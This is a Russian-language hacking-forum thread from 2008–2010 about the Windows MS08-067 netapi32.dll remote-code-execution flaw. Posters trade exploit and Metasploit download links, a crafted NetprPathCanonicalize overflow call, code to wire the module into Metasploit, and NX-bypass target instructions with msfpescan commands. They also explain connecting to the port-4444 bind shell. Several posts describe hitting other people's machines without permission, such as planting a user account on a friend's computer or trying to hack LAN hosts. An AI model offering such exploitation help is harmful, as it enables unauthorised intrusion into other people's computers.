Просмотр полной версии : Уязвимость netapi32.dll MS08-067
Уязвимы все Windows системы..
exploit под винду (биндит 4444 порт)
http://milw0rm.com/sploits/2008-MS08-067.rar
сканер на уязвимость по диапазону
http://www.securitylab.ru/analytics/362523.php
[23/11/2008] Вот уже и MSF 3.2 вышла полная, качаем по выбору Windows (http://metasploit.com/framework/downloader/?id=framework-3.2.exe), Linux (http://metasploit.com/framework/downloader/?id=framework-3.2.tar.gz). Внутри рабочий и полный сплоит. Все виндовсы на автомате ломаются :)
проверяем....
Hellsp@wn
25.10.2008, 19:56
кто может, тот написал и юзает, остальные ждут :)
может кто поделится???
рано или поздно все равно уйдет в паблик...
может кто поделится???
рано или поздно все равно уйдет в паблик...
обычно уходит поздно....
нашел способ сделать нормальную вещь, но нужен программер на Ruby
значит в MetasploitFramework была такая уязвимость в базе Microsoft CanonicalizePathName() MSO6-040 Overflow, она использует ту же функц. при вызове RPC что и новый сплоит NetpwPathCanonicalize в службе Сервер.
вызов который нужен для переполнения, С:
_NetprPathCanonicalize(handle, L”AAA”, L”.\\\\x\\..\\..\\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxx”, x, 1000, L”", &q, 1);
после переполнения будет 1000 рабочих байт (пойдет любой шеллкод)
вот статья на англ.: http://www.dontstuffbeansupyournose.com/
собственно то и нужно его организовать на Ruby дописав либо изменив вызов RPC в сплоите CanonicalizePathName() MSO6-040 пакета MetasploitFramework (www.metasploit.com)
вот пару ссылок на возможные сплоиты: (но нужен логин на immunityinc.com)
Windows 2000
https://www.immunityinc.com/downloads/immpartners/ms08_067.tgz
https://www.immunityinc.com/downloads/immpartners/ms08_067-2.tgz
Windows XP SP3 https://www.immunityinc.com/downloads/immpartners/ms08_067-3.tgz
кто что находит складываем в тему :)
winterfrost
26.10.2008, 17:22
Добавлю ещё пару интересных ссылок по теме ;)
Декомпилированный код уязвимой функции из netapi32.dll, способствует пониманию сути уязвимости:
http://www.phreedom.org/blog/2008/decompiling-ms08-067/
вот ещё интересное чтиво:
http://secureblog.info/articles/364.html
Кстати PoC (http://milw0rm.com/sploits/2008-ms08-067.zip) мне удалось скомпилить и запустить, но увы, он не сработал у меня (возможно из-за того что компилировал на Висте и натравливал на XP...) вернул RPC_S_CALL_FAILED =(
Возможно у кого-то есть Gimmiv.A со всеми DLL файлами? Или хотя бы basesvc.dll? Потому что в интернете получилось найти лиш дропер, в котором нет кода, эксплуатирующего данную уязвимость.
Возможно у кого-то есть Gimmiv.A со всеми DLL файлами? Или хотя бы basesvc.dll? Потому что в интернете получилось найти лиш дропер, в котором нет кода, эксплуатирующего данную уязвимость.
+1 :) вполне реально что Gimmiv.A в библиотеках экспортирует ф-цию которая отправляет вызов RPC
ищю вирь...
вот еще тема поиска backtrack's remote-exploit forum (http://forums.remote-exploit.org/showthread.php?t=17807)
winterfrost
27.10.2008, 12:27
тестируем: http://milw0rm.com/exploits/6841
прекрастно сработал на моей пропатченой висте и XP SP3 заBSODил :)
под linux wine ethersoft 1.0.9 не может создать запрос, не хватает библиотек (
Hellsp@wn
27.10.2008, 19:28
мда, выложили хрень какую-то, несработал не на одной из тестовых тачек :) без напильника не обойтись.
мда, выложили хрень какую-то, несработал не на одной из тестовых тачек :) без напильника не обойтись.
странно... у меня в локалке на нескольких тачках небыло эффекта, но служба вылетала почти всегда после первого запуска :)
может я и фигню скажу, но... ты после того как сплоит используеш, на порт 4444 подсоединяешся ? :D
netcat [IP] 4444
Сцыль (http://www.securitylab.ru/software/233635.php)
или
telnet [IP] 4444
Hellsp@wn
27.10.2008, 22:52
хех, там в сорце всё написано ;)
даже на варе не патченная винда, не вылетела...
гг.. )
у кого кроме меня работает?
проверил на:
Windows XP SP3 32 bit RUS результат DoS
Windows Vista Home Basic 32 bit RUS результат DoS
Windows 2003 результ коммандная строка
ваще в идеале для сработки нужен общий доступ к файлам и принтерам и выключенный фаер :)
Тестил на работе результаты такие:
1) 3 машины с Win 2003 RUS (постоянные обновления)- никакой реакции
2) 3 машины с Win XP SP2 RUS (без обновлений)- никакой реакции
3) 2 машины с Win XP SP3 RUS (постоянные обновления)- никакой реакции
Тестил дома:
1) Win 2003 ENG (без обновлений)- никакой реакции.
2) Win XP SP 2 на виртуалке (без обновлений) - никакой реакции
Везде писалось maybe patched!
12usver12
28.10.2008, 11:55
на двух maybe patched
на одной тачке написало:
SMB Connect OK!
RpcExceptionCode() = 5
хотя к сожалению я не могу щас посмотерть что с сан саныча тачкой , он ушел куда-то :)
XP SP2 без реакции в любой конфигурации ((
какой то не особо универсальный сплоит на milw0rm выложыли :(
час назад HDmore на блоге Twitter затрещял про https://metasploit.com/ms08_067_netapi.rb :)
типо новый PoC модуль на MSF 3.1
пытаюсь скачать... google еще не прокешировал...
на twitter зайти можно только с хорошым проксиком :)
пишет:
supports XP SP2/SP3 + DEP and Windows 2003 SP0/SP1 without DEP, more targets soon...
доступно http://metasploit.com/dev/trac/changeset/5798
скоро появится на milw0rm.com :)
-Onotole-
28.10.2008, 14:24
эм,я не врубил,как апдейт юзать о_О
эм,я не врубил,как апдейт юзать о_О
сплоит на metasploit.com сырой до ужаса.. нужно ручками дописать несколько неизвестных строк ))
сейчас пробую запускать вставив строчки из ms06_040_netapi
все сделал :)
вот сам исправленный сплоит для Metasploit Framework 3.2
http://multi-up.com/29967/
а вот последний билд Metasploit Framework 3.2 запакованый с исправленным MS08_067_netapi.rb
запускать на Linux или BSD like системах )), сплоит лежыт modules/exploits/windows/smb
http://multi-up.com/29972/
сплоит для XP SP2/SP3 DEP, 2003 SP0/SP2 no-DEP, проверяем....
friend-friend
28.10.2008, 18:59
вроде обновился, но эксплойта нет. это нормально?
13.09 root@bufalo ~/framework-3.1
# svn update
At revision 5798.
13.10 root@bufalo ~/framework-3.1
# cd modules/exploits/windows/smb/
13.13 root@bufalo ~/framework-3.1/modules/exploits/windows/smb
# ls -al
total 180
drwxr-xr-x 3 root wheel 512 Oct 28 13:04 .
drwxr-xr-x 37 root wheel 1024 Jan 28 2008 ..
drwxr-xr-x 6 root wheel 512 Oct 28 13:09 .svn
-rw-r--r-- 1 root wheel 2907 Jan 28 2008 ms03_049_netapi.rb
-rw-r--r-- 1 root wheel 7945 Jan 28 2008 ms04_007_killbill.rb
-rw-r--r-- 1 root wheel 4671 Jan 28 2008 ms04_011_lsass.rb
-rw-r--r-- 1 root wheel 2662 Jan 28 2008 ms04_031_netdde.rb
-rw-r--r-- 1 root wheel 5613 Jan 28 2008 ms05_039_pnp.rb
-rw-r--r-- 1 root wheel 5990 Jan 28 2008 ms06_025_rasmans_reg.rb
-rw-r--r-- 1 root wheel 3282 Jan 28 2008 ms06_025_rras.rb
-rw-r--r-- 1 root wheel 8135 Jan 28 2008 ms06_040_netapi.rb
-rw-r--r-- 1 root wheel 3778 Jan 28 2008 ms06_066_nwapi.rb
-rw-r--r-- 1 root wheel 3568 Jan 28 2008 ms06_066_nwwks.rb
-rw-r--r-- 1 root wheel 8152 Jan 28 2008 msdns_zonename.rb
-rw-r--r-- 1 root wheel 7147 Jan 28 2008 psexec.rb
-rw-r--r-- 1 root wheel 13599 Jan 28 2008 smb_relay.rb
вроде обновился, но эксплойта нет. это нормально?
13.09 root@bufalo ~/framework-3.1
# svn update
At revision 5798.
13.10 root@bufalo ~/framework-3.1
# cd modules/exploits/windows/smb/
13.13 root@bufalo ~/framework-3.1/modules/exploits/windows/smb
# ls -al
total 180
drwxr-xr-x 3 root wheel 512 Oct 28 13:04 .
drwxr-xr-x 37 root wheel 1024 Jan 28 2008 ..
drwxr-xr-x 6 root wheel 512 Oct 28 13:09 .svn
-rw-r--r-- 1 root wheel 2907 Jan 28 2008 ms03_049_netapi.rb
-rw-r--r-- 1 root wheel 7945 Jan 28 2008 ms04_007_killbill.rb
-rw-r--r-- 1 root wheel 4671 Jan 28 2008 ms04_011_lsass.rb
-rw-r--r-- 1 root wheel 2662 Jan 28 2008 ms04_031_netdde.rb
-rw-r--r-- 1 root wheel 5613 Jan 28 2008 ms05_039_pnp.rb
-rw-r--r-- 1 root wheel 5990 Jan 28 2008 ms06_025_rasmans_reg.rb
-rw-r--r-- 1 root wheel 3282 Jan 28 2008 ms06_025_rras.rb
-rw-r--r-- 1 root wheel 8135 Jan 28 2008 ms06_040_netapi.rb
-rw-r--r-- 1 root wheel 3778 Jan 28 2008 ms06_066_nwapi.rb
-rw-r--r-- 1 root wheel 3568 Jan 28 2008 ms06_066_nwwks.rb
-rw-r--r-- 1 root wheel 8152 Jan 28 2008 msdns_zonename.rb
-rw-r--r-- 1 root wheel 7147 Jan 28 2008 psexec.rb
-rw-r--r-- 1 root wheel 13599 Jan 28 2008 smb_relay.rb
читай:
вот сам исправленный сплоит для Metasploit Framework 3.2
http://multi-up.com/29967/
а вот последний билд Metasploit Framework 3.2 запакованый с исправленным MS08_067_netapi.rb
запускать на Linux или BSD like системах )), сплоит лежыт modules/exploits/windows/smb
http://multi-up.com/29972/
сплоит для XP SP2/SP3 DEP, 2003 SP0/SP2 no-DEP, проверяем....
friend-friend
28.10.2008, 19:36
читай:
прочел и тяну, спасибо.
ну а вообще скажем так по правильному, ведь почему его там нет?
Мур не успел его даже дописать... ;) developer версия
http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb?rev=5798
стырил доделал и запаковал с последним билдом фреймворка
как только доделает возможно будут все target от 2000 до 2008 винды :D
-Onotole-
28.10.2008, 20:05
возможно юзать не имея метасплоита? о_о
тестируем: http://milw0rm.com/exploits/6841
у мну вопрос, вот я пробую сполоит и вижу :
SMB Connect OK!
Send Peyload Over
второй раз когда попробывал сплоит на етот ип появилось такое :
SMB Connect OK!
RpcExceptionCode<> = 1722
ет тип все прошло удачно? и что теперь делать как получить командную строку если возможно?
-Onotole-
28.10.2008, 20:16
коннектишся к серверу на порт 4444,например через Putty (:
ет тип все прошло удачно? и что теперь делать как получить командную строку если возможно?
да, удачно... но может быть просто глюк... так как exploit расчитан на english винду.
возможно юзать не имея метасплоита? о_о
нет
да, удачно... но может быть просто глюк... так как exploit расчитан на english винду.
наверно ето всеже фейк потому что виндовс русский и я ничем подконектиться туда немогу или у меня руки кривые =(
Pernat1y
28.10.2008, 23:46
у меня каспер этот "фэйк" блочит )
у меня каспер этот "фэйк" блочит )
какой "фэйк"?
тот что с milw0rm.com или с metasploit.com?
ты когда устанавливаеш самый большой сборник хак утилит и шелкодов с эксплоитами в перемешку ты думаеш что антивирус у тебя тупо курит в сторонке?
:confused:
ждем версию под русскую венду :p
ждем версию под русскую венду :p
все ручками.... ручками... нужно дописывать :p
This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to add new targets.
перевод: для каждого сервис пака и ленг пака винды нужен адрес, е*ашым по шагам указанным внизу :D чтобы добавить новый таргет
читаем http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb?rev=5836
предлагаю для разных систем постить следующее
Windows [XP/2000/2003/Vista] [SP?] [языковой пакет] [адрес полученный по инструкции]
Pernat1y
06.11.2008, 11:49
какой "фэйк"?
тот что с milw0rm.com или с metasploit.com?
ты когда устанавливаеш самый большой сборник хак утилит и шелкодов с эксплоитами в перемешку ты думаеш что антивирус у тебя тупо курит в сторонке?
:confused:
с милв0рма.
я имел в виду, что КИС блочит сетевую атаку...
Ё-мае он с каждым днем обновляется
и уже в списке есть
Windows XP SP2 Russian (NX)
Windows XP SP3 Russian (NX)
=)))))))
friend-friend
07.11.2008, 14:44
объясните почему нет в версии 3.1 сплойта?
12.42 root@bufalo /usr/home/friend/framework-3.1
# svn update
At revision 5847.
12.42 root@bufalo /usr/home/friend/framework-3.1
# ls -al modules/exploits/windows/smb/
total 180
drwxr-xr-x 3 root wheel 512 Oct 28 13:16 .
drwxr-xr-x 37 root wheel 1024 Jan 28 2008 ..
drwxr-xr-x 6 root wheel 512 Nov 7 12:42 .svn
-rw-r--r-- 1 root wheel 2907 Jan 28 2008 ms03_049_netapi.rb
-rw-r--r-- 1 root wheel 7945 Jan 28 2008 ms04_007_killbill.rb
-rw-r--r-- 1 root wheel 4671 Jan 28 2008 ms04_011_lsass.rb
-rw-r--r-- 1 root wheel 2662 Jan 28 2008 ms04_031_netdde.rb
-rw-r--r-- 1 root wheel 5613 Jan 28 2008 ms05_039_pnp.rb
-rw-r--r-- 1 root wheel 5990 Jan 28 2008 ms06_025_rasmans_reg.rb
-rw-r--r-- 1 root wheel 3282 Jan 28 2008 ms06_025_rras.rb
-rw-r--r-- 1 root wheel 8135 Jan 28 2008 ms06_040_netapi.rb
-rw-r--r-- 1 root wheel 3778 Jan 28 2008 ms06_066_nwapi.rb
-rw-r--r-- 1 root wheel 3568 Jan 28 2008 ms06_066_nwwks.rb
-rw-r--r-- 1 root wheel 8152 Jan 28 2008 msdns_zonename.rb
-rw-r--r-- 1 root wheel 7147 Jan 28 2008 psexec.rb
-rw-r--r-- 1 root wheel 13599 Jan 28 2008 smb_relay.rb
12.42 root@bufalo /usr/home/friend/framework-3.1
to friend-friend: потому что он еще в разработке здесь (http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb?rev=5847)
чтобы вставить в фреймворк нужно впереди кода дописать класс чтобы было так:
require 'msf/core'
module Msf
class Exploits::Windows::Smb::MS08_067_NETAPI < Msf::Exploit::Remote
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
и в конце файла добавить:
end
и сохранить в файлик:
/framework/modules/exploits/windows/smb/ms08_067_netapi.rb
Linux - куул :D
friend-friend
07.11.2008, 15:22
спасибо.
а с чем может связана данная ошибка?
13:11:03 - ms08_067_netapi [-] Exploit failed: undefined method `smb_fingerprint' for #<#<Class:0x49000d4>:0x64ec590>
спасибо.
а с чем может связана данная ошибка?
13:11:03 - ms08_067_netapi [-] Exploit failed: undefined method `smb_fingerprint' for #<#<Class:0x49000d4>:0x64ec590>
сплоит под последнюю версию MSF 3.2
http://metasploit.com/framework/downloader/?id=framework-trunk-snapshot.tar.gz
friend-friend
07.11.2008, 17:39
хорошая ошибка была :)
http://metasploit.com/dev/trac/changeset/5847
срач :)
sratch вместо scratch мог написать только советский чел :)
такс... вышла неплохая утилита для проверки всей сетки на уязвимость 08-067... ну чтобы знать куда применить ;)
http://www.securitylab.ru/_Article_Images/pt.gif
http://www.securitylab.ru/analytics/362523.php
sratch вместо scratch мог написать только советский чел
а я то думаю, чего это они вдруг потерли новый сплойт и поставили старый.
Только дошли руки потестить его
не запускается эксплойт в фраймворке из поста выше :(
WARNING! The following modules could not be loaded! /home/amir/Desktop/framework-trunk/modules/exploits/windows/smb/ms08_067_netapi.rb: Loaded file, but no classes were registered.
to FaR-G9: прочти 40 пост (http://forum.antichat.ru/showpost.php?p=931301&postcount=40)
омайгод... я снова юзаю винду :D
мля рано обрадовался (
при отправке запроса выскакивает
NoMethodError in ExploitsController#config
это и есть на 3.2 качал по твоей ссылке
они опять там что-то мутят на сайте, выложи свой сплойт :)
сплоит на рапиде (http://rapidshare.com/files/161576240/framework.tar.gz.html)
во, эта работает
ща попробую кого-нить похекоть, отпишксь
ниодин комп в локалке не хэкнул, хотя на многих машинах сканер показывает уязвим0
кто сплойт юзал отпишитесь
friend-friend
11.11.2008, 14:43
подскажите где в метасплойте можно отключить проверку версии руби?
# ./msfweb
************************************************** *********************
*** *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these *
*** issues have been corrected. Alternatively, you can download, *
*** build, and install the latest Ruby snapshot from: *
*** - http://www.ruby-lang.org/ *
*** For more information, please see the following URL: *
*** - https://bugs.launchpad.net/bugs/282302 *
*** *
************************************************** *********************
Гг, тестил на XP SP3, в 20 случаях из 25 результат - надпись maybe patched на компе слетает сеть и впн подключение
metasploit
XP SP3
тестил на машинах с включенным server
из 30 попыток 25 успешных
аналогично с 2003 sp2
entrancer
12.11.2008, 23:54
у кого есть эксплоит (не в metasploit варианте ) ? стукните icq#6о134о или в паблик :)
winterfrost
13.11.2008, 07:54
тестируем очередой эксплоит http://milw0rm.com/exploits/7104
У кого билдер установлен.. откомпилируйте плз.. за + ;)
В параметре PAYLOAD что указыв0ать?
Сплоит пишет
Payload information: Space: 400
Avoid: 8 characters
реально у меня сработал только метасплоит…. Во всех случаях, где писало, что патч не установлен – ломается на все 100%. При условии, что metasploit обновлен до 3,2 beta2. и сплоит работает почти на всех WiNdOws и только с локальной сети. PS. Знатоки хакеры, подскажите сплоит для XP2 RU через инет….
Перезалейте сплоит на рапиде
А то не качается...
Mnogo gde proboval vezde
Started bind handler
[-] Exploit failed: The connection timed out (****:445).
тоже большая просьба перезалить сплоит на рапиду а то удалили его
gold-goblin
19.11.2008, 19:16
чтоб не удаляли залейте сюда...
http://d.lsass.us/
Вот держите http://rapidshare.com/files/166097531/ms08_067_netapi.rb.html
можно для windows платформ залить куда нибудь
Вот уже и MSF 3.2 вышла полная, качаем по выбору Windows (http://metasploit.com/framework/downloader/?id=framework-3.2.exe), Linux (http://metasploit.com/framework/downloader/?id=framework-3.2.tar.gz). Внутри рабочий и полный сплоит. Все виндовсы на автомате ломаются :)
*** WINDOWS XP SP2/SP3 TARGETS ***
This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to
add new targets.
If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
DisableNX elements of the target hash.
If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
First obtain the value for the Ret element of the hash with the following command:
$ msfpescan -j esi acgenral.dll
Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
Next, find the location of the function we use to disable NX. Use the following command:
$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
This address should be placed into the DisableNX element of the target hash.
The Scratch element of 0x00020408 should work on all versions of Windows
The actual function we use to disable NX looks like this:
push 4
lea eax, [ebp+arg_0]
push eax
push 22h
push 0FFFFFFFFh
mov [ebp+arg_0], 2
call ds:__imp__NtSetInformationProcess@16
как юзать ?
У меня есть винда на которой сплоит не работает.
Сделал все по инструкции.
получил :
$ msfpescan -j esi acgenral.dll
[c:\m\acgenral.dll]
0x6fe1f807 call esi
0x6fe214f8 call esi
0x6fe2153f call esi
0x6fe218ab call esi
0x6fe218b6 call esi
0x6fe22b32 call esi
0x6fe22b37 call esi
0x6fe22b65 call esi
0x6fe22b70 call esi
0x6fe22b94 call esi
0x6fe22b9a call esi
0x6fe22bea call esi
0x6fe22bef call esi
0x6fe2349c call esi
0x6fe2350c call esi
0x6fe25334 call esi
0x6fe2533b call esi
0x6fe253b4 call esi
0x6fe253bb call esi
0x6fe25a60 call esi
0x6fe25a8e call esi
0x6fe25add call esi
0x6fe25ae2 call esi
0x6fe26961 call esi
0x6fe26964 call esi
0x6fe26967 call esi
0x6fe26a08 call esi
0x6fe26a44 call esi
0x6fe26a54 call esi
0x6fe27fef call esi
0x6fe27ff9 call esi
0x6fe2856e call esi
0x6fe2b04a call esi
0x6fe2d8c5 call esi
0x6fe2d8cd call esi
0x6fe2daa8 call esi
0x6fe2dac0 call esi
0x6fe2dad3 call esi
0x6fe2daeb call esi
0x6fe2dafe call esi
0x6fe2db16 call esi
0x6fe2db2d call esi
0x6fe2db43 call esi
0x6fe2db6c call esi
0x6fe2dc4c call esi
0x6fe2dc6a call esi
0x6fe2dc7d call esi
0x6fe2dc95 call esi
0x6fe2dcaa call esi
0x6fe2de42 call esi
0x6fe2deaf call esi
0x6fe2e055 call esi
0x6fe2e06a call esi
0x6fe2e0f5 call esi
0x6fe2e105 call esi
0x6fe3092e call esi
0x6fe3093c call esi
0x6fe31358 call esi
0x6fe31375 call esi
0x6fe31403 call esi
0x6fe31421 call esi
0x6fe33830 call esi
0x6fe33843 call esi
0x6fe3387a call esi
0x6fe3388d call esi
0x6fe338c4 call esi
0x6fe338d7 call esi
0x6fe34f80 call esi
0x6fe34fa9 call esi
0x6fe34fd2 call esi
0x6fe34ffb call esi
0x6fe35024 call esi
0x6fe3504d call esi
0x6fe35076 call esi
0x6fe3509f call esi
0x6fe350c8 call esi
0x6fe38938 call esi
0x6fe3896f call esi
0x6fe389a2 call esi
0x6fe389c5 call esi
0x6fe3ba79 push esi; ret
0x6fe3bac2 push esi; ret
0x6fe3bafb push esi; ret
0x6fe3c9da call esi
0x6fe3ca35 call esi
0x6fe3d082 call esi
0x6fe3d093 call esi
0x6fe3d0a0 call esi
0x6fe3d0b6 call esi
0x6fe3d0c7 call esi
0x6fe3e111 call esi
0x6fe3e124 call esi
0x6fe3ff23 call esi
0x6fe4174b call esi
$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
[c:\m\acgenral.dll]
0x6fe217c2 6a048d4508506a226aff
Что делать дальше ?
С помощью вышеуказанной уязвимостью завел юзера на машине друга, но в группу "АДМИНИСТРОТОРЫ" добавить не получается - кодировка не позволяет. Нельзя ли как нибудь это сделать? Хотя бы натолкните на мысль (кодировку пробовал менять). И вообще возможно ли это?
Господа, не могли бы объяснить новичку, как этим пользоваться? http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html
И поможет ли это?
С помощью вышеуказанной уязвимостью завел юзера на машине друга, но в группу "АДМИНИСТРОТОРЫ" добавить не получается - кодировка не позволяет. Нельзя ли как нибудь это сделать? Хотя бы натолкните на мысль (кодировку пробовал менять). И вообще возможно ли это?
Лучше закачай радмин и не парься, а если хочешь поменять кодировку пробуй chcp 1251, а птом штирлицом расшифровывай
GeForce7
11.12.2008, 00:01
Господа, не могли бы объяснить новичку, как этим пользоваться? http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html
И поможет ли это?
Это работает в Метасплойте под линух, если через patch не рабоатет, отрывай указанные файлы
ib/rex/ui/interactive.rb
lib/rex/ui/text/dispatcher_shell.rb
добавь и замени нужные строки, "-" означает удалить строку, + та строка который нада заменить её, у меня это сработало, по русски стали отображаться файлы, но в некоторых случаях. например ipconfig /all руский сёоавно не отображается правильно, но это не принципиально главное шо файлы стали норм. А да это работает тока в линухе в обычной консоле
m-Xacker
12.01.2009, 15:44
Народ приз залейте в файлообменик framework-3.2.exe а то сайт не пашет для скачки
http://spool.metasploit.com/releases/framework-3.2.exe
:(
m-Xacker
19.01.2009, 20:13
Кто знает что это такое может быть, работаю через shel_tcp поднимаю командуню строку, вижу уязвимый комп приконектился, открываю окошко а там нечего нет и комп с уязвимостью автоматически уходит в дисконект.... ???
И ещё хотел спросить, кто может подскажет можно ли через фаер как нето этой уязвимостью воспользоваться, а то похоже строенный фаер отрубает когда провожу атаку на комп.
_PARAZIT_
23.03.2009, 22:51
народ подскажите как этими чудесами пользоваться.....(тем что не MSF)
- я скачал сканер уязвимостей (ссылка была выше), посканил нашел с десяток уязвимых машин....
- запустил эксплоит: "ms08-067 xxx.xxx.xxx.xxx"
пишет: SMB connect OK!
Send payload Over!
- дальше че делать? пытался телнетом на 4444 порт удаленной машины приконектицца - нифига не работает.....
в чем дело (кроме синдрома кривых ручек)?????
поставь себе метасплоит фреймвёрк, там всё проще)
Поднимаю тему...
Интересует достоверность выдачи сканера.
Просканил около 40 машин и только 1 оказалась бажной. Может сканер врет. почти у всех версии маздая 5.1
Чем может вызвано такой малый "КПД"?
Поднимаю тему...
Интересует достоверность выдачи сканера.
Просканил около 40 машин и только 1 оказалась бажной. Может сканер врет. почти у всех версии маздая 5.1
Чем может вызвано такой малый "КПД"?
Посмотри дату когда эта уязвимость была обнаружена! вот тебе и причина!))
ArmagedDance
28.05.2010, 06:56
Почему-то после того, как нахожу уязвимость, не могу залогиниться по ftp к своему компьютеру. Испробовал 3 ftp сервера. Пишу ftp 192.168.*.*
затем 192.168.*.*(none): anonymous
и ничего не происходит. в логах ftp-сервера соединение значится как not logged in
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot